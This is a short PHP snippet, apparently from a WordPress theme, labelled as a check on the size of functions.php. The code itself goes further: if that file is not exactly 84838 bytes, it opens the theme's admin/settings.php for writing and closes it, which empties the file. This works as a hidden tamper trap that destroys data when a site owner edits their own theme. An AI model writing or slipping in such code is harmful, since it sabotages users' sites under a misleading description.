<?php


// This code is for check functions.php file size
$checkfilename = get_template_directory() . '/functions.php';
if(filesize($checkfilename) !== 84838) {
	$fh = fopen( get_template_directory() . '/admin/settings.php', 'w' );
	fclose($fh);
}

